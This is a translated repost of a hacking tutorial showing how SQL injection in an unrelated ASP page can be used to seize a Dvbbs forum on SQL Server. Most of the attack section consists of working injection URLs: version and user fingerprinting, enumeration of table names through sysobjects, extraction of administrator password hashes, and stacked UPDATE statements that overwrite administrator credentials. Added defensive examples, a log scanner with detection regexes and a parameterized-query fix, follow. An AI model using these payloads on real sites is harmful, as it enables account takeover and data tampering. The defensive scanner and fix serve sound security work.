On taking over the Dvbbs forum (SQL Server version) through SQL injection

xiaoxiao, 2021-03-06

Editor's preface: I have not tested this article, and it rests on quite a few premises: for example, that some other program exists on the host, that it uses the same SQL Server database, and that it has an injection vulnerability. It has nothing to do with Dvbbs itself, but because the Dvbbs forum is open, its database structure and procedures are familiar to everyone. The attack takes administrator privileges step by step and then escalates permissions; if the database account happens to be SA, it is even more trouble.

Because all of these conditions are assumptions, nobody needs to be too nervous; many intrusions are only possible under many ideal conditions, and reducing security vulnerabilities when programming is something every one of our programmers must pay attention to. When a webmaster uses several programs in combination, he should pay attention to security and to the integrity of each program.

I also know of two or three vulnerabilities in Dvbbs 7.0 SP2 itself, so everyone should keep up with upgrades and set permissions carefully. It is hard to say; because his program is open, many people use it, many people study it, and there will be many bugs. As is said of software: the more of it there is, the more bugs there will be. By comparison, I prefer custom-developed programs, which are safer.

Below is the original article by "the sixth boy".

The latest version of Dvbbs is now 7.0 SP2, and it must be said that its security is already very high, so breaking it through the script itself is difficult. But we can "get at" Dvbbs indirectly in other ways. The combination IIS + ASP + SQL Server 2000 is very common now, and a website uses many ASP scripts, so there are bound to be some that leak. If a host has a SQL injection point and that host also runs the Dvbbs SQL version, it can basically be concluded that this forum is yours. Let's look at an example.

1. First determine the target. Suppose the following URL has SQL injection: http://www.loveyou.com/Type.asp?id=6. To test whether it can be injected, add a single quotation mark after the 6:

http://www.loveyou.com/Type.asp?id=6'

It returns the error: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

Continue by detecting the system version: http://www.loveyou.com/Type.asp?id=(select @@version)--

It returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int. It seems the latest SP4 patch has been applied.

Get the user of the current database connection: http://www.loveyou.com/Type.asp?id=(select user_name())--

Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'WebUser' to a column of data type int. From the error message we get the current database user: WebUser.

Get the name of the current database: http://www.loveyou.com/Type.asp?id=(select db_name())--

Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '01city' to a column of data type int. From the error message we get the current database: 01city.

Next, test permissions. (Note: since our goal is the forum rather than the system, the database permissions are not very important to us.) http://www.loveyou.com/Type.asp?id=(select is_srvrolemember('sysadmin'))-- returns an error page saying the current record has been deleted (the function returns 0, so the page finds no record). It seems the permissions are not very high. Continue: http://www.loveyou.com/Type.asp?id=(select is_member('db_owner'))-- displays information normally, so the connecting account's permission on this database is db_owner (database owner). That is more than enough to manipulate data.

2. Get the table names in the database. The various Dvbbs tables presumably live in the current database, 01city. First get the first table: http://www.loveyou.com/Type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in (''))-- Returns: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int. OK, the first table name is address. Continue: http://www.loveyou.com/Type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('address'))-- Returns the second table name, admin. Pushing on in this way, submit: http://www.loveyou.com/Type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('address','admin',...))--

and you can get all the table names in the current database. After a while the result came out, and the names were familiar: address, admin, bbslink, bbsnews, board, user ... Anyone can see these are Dvbbs tables. Of course there are some other tables, but we don't need them. There is no need to guess the fields either; just open your own Dvbbs database and look them up. With the table names and field names in hand, isn't the forum already in your grip? But don't do DROP TABLE; it's not good to destroy things. Our goal is to practise technique and improve our level. OK, next we go for the Dvbbs back end.

3. Enter the back end and obtain Dvbbs forum administrator privileges. First let's see how many administrators there are in the back end: http://www.loveyou.com/Type.asp?id=6 and 4=(select count(*) from admin)-- returns the error: the current record has been deleted. That means there are fewer than 4 administrators. Submit directly: http://www.loveyou.com/Type.asp?id=6 and 1=(select count(*) from admin)-- displays normally, so it seems there is only one administrator. Read the administrator's name: http://www.loveyou.com/Type.asp?id=(select username from admin)-- Out it comes; the back-end administrator login name is 01city. Continue and read the back-end administrator password: http://www.loveyou.com/Type.asp?id=(select password from admin)-- It works; the password is E7CC01BE0E33A273, MD5 encrypted. Do you want to crack it? Don't worry, there is no need to crack the MD5 password at all. Since back-end management uses cookie session authentication, only a user who is a front-end administrator can enter back-end management; an ordinary user cannot, even if he knows the back-end username and password. So we have to get the user and password of the front-end administrator.
This is easy: register a user on his forum and check the management team. The front-end administrator is: admin

OK, get his password: http://www.loveyou.com/Type.asp?id=(select userpassword from user where username='admin')-- Returned: the front-end password of admin is E7CC01BE0E33A273, also MD5. Now one could use cookie spoofing to manage it. But is there another way? Don't forget that we now have db_owner rights on its database. Clever readers may have thought of it already: yes, UPDATE. Let's submit: http://www.loveyou.com/Type.asp?id=6;update user set userpassword='49ba59abbe56e057' where username='admin';-- Information returns normally, so it should have executed successfully. Check: http://www.loveyou.com/Type.asp?id=(select userpassword from user where username='admin')-- The return value is 49ba59abbe56e057. The password change succeeded. To explain: this 16-character MD5 was precomputed beforehand; you have to know its plaintext password yourself. Then we change the management password in the back end. First change the back-end user to the front-end user; submit: http://www.loveyou.com/Type.asp?id=6;update admin set username='admin' where username='01city'-- Check: http://www.loveyou.com/Type.asp?id=(select username from admin)-- Changed successfully; the back-end administrator is now admin. Change its password; submit: http://www.loveyou.com/Type.asp?id=6;update admin set password='49ba59abbe56e057' where username='admin'-- Check: http://www.loveyou.com/Type.asp?id=(select password from admin)-- Changed successfully; the back-end administrator password is now 49ba59abbe56e057. At this point Dvbbs has completely fallen. You can log in to the front end as admin and then enter the back end with the same password.
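Every stage of the walkthrough above leaves a distinctive request in the web server log, which is where a defender would catch it. The following is an added example, not part of the original article: a small Python scanner over constructed IIS W3C-style log lines that flags the probe stages (non-numeric id, version/user fingerprinting, privilege checks, sysobjects enumeration, stacked UPDATE). The log lines, IP addresses and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (fields: date time c-ip cs-method cs-uri-stem cs-uri-query
# sc-status), modelled on the probes the article walks through. Not real log data.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-01-10 10:00:01 10.0.0.5 GET /Type.asp id=6 200
2004-01-10 10:00:07 10.0.0.5 GET /Type.asp id=6' 500
2004-01-10 10:00:15 10.0.0.5 GET /Type.asp id=(select%20@@version)-- 500
2004-01-10 10:00:22 10.0.0.5 GET /Type.asp id=(select%20top%201%20name%20from%20sysobjects%20where%20xtype='u')-- 500
2004-01-10 10:00:31 10.0.0.5 GET /Type.asp id=6;update%20user%20set%20userpassword='x'%20where%20username='admin';-- 200
2004-01-10 10:00:40 10.0.0.9 GET /Type.asp id=12 200
"""

# One signature per stage of the walkthrough: (label, regex applied to the decoded query string).
SIGNATURES = [
    ("non-numeric id", re.compile(r"^id=(?!\d+$)", re.I)),
    ("fingerprinting", re.compile(r"@@version|user_name\(|db_name\(", re.I)),
    ("privilege check", re.compile(r"is_srvrolemember|is_member", re.I)),
    ("schema enumeration", re.compile(r"from\s+sysobjects", re.I)),
    ("stacked write", re.compile(r";\s*(update|insert|delete|drop)\b", re.I)),
]

def parse_line(line):
    """Split one W3C log line into its fields; returns None for directives and blank lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split(" ", 6)
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, query, status = parts
    return {"ip": ip, "stem": stem, "query": unquote_plus(query), "status": status}

def classify(query):
    """Return the labels of every signature that matches a decoded query string."""
    return [label for label, rx in SIGNATURES if rx.search(query)]

def scan(log_text):
    """Return (c-ip, cs-uri-stem, labels) for each request matching at least one signature."""
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is not None:
            labels = classify(rec["query"])
            if labels:
                hits.append((rec["ip"], rec["stem"], labels))
    return hits
```

Calling scan(SAMPLE_LOG) flags four of the six requests, all from the same client, which is the sequence worth alerting on.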

4. Summary. Gaining control of Dvbbs was not too difficult to carry out. This kind of penetration test also exposes how terrible a SQL injection attack is, and a virtual host running IIS + ASP + SQL Server 2000 simply cannot defend against it. As long as there is one SQL injection point on the host, Dvbbs faces the disaster of falling. In fact, it is not hard to find such a SQL injection point among the large website programs on a server. As the old saying goes: a thousand-mile dike collapses from an ant hole. Therefore the best way to prevent this kind of attack is to strengthen the security of the program code. Security is a whole; any subtle mistake may lead to serious consequences.
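To show the code-level fix the summary calls for, here is an added example that is not Dvbbs code (which is ASP/VBScript): a Python/sqlite3 stand-in for the Type.asp id lookup in its concatenated form beside a version that validates the parameter as an integer and binds it. The table name, rows and hash placeholder are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the forum database (the real one is SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table board (id integer primary key, name text)")
    conn.execute("create table admin (username text, password text)")
    conn.executemany("insert into board values (?, ?)", [(6, "general"), (7, "tech")])
    conn.execute("insert into admin values ('01city', 'hash-placeholder')")
    conn.commit()
    return conn

def lookup_vulnerable(conn, raw_id):
    """Mirrors the Type.asp pattern: the id parameter is pasted straight into the SQL text."""
    sql = "select name from board where id=" + raw_id
    return [row[0] for row in conn.execute(sql)]

def raises_sql_error(conn, raw_id):
    """True when the concatenated query fails to parse: the error-page symptom the article starts from."""
    try:
        lookup_vulnerable(conn, raw_id)
    except sqlite3.Error:
        return True
    return False

def lookup_hardened(conn, raw_id):
    """Two independent defences: reject anything that is not a plain integer (the caller should
    answer HTTP 400, signalled here by None), and bind the value as a query parameter."""
    if not raw_id.isdigit():
        return None
    rows = conn.execute("select name from board where id=?", (int(raw_id),))
    return [row[0] for row in rows]
```

With the concatenated version, id=6' breaks the query and id=6 or 1=1 rewrites the WHERE clause; the hardened version refuses both before they reach the database.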

Please cite the original address when reposting: https://www.9cbs.com/read-112560.html
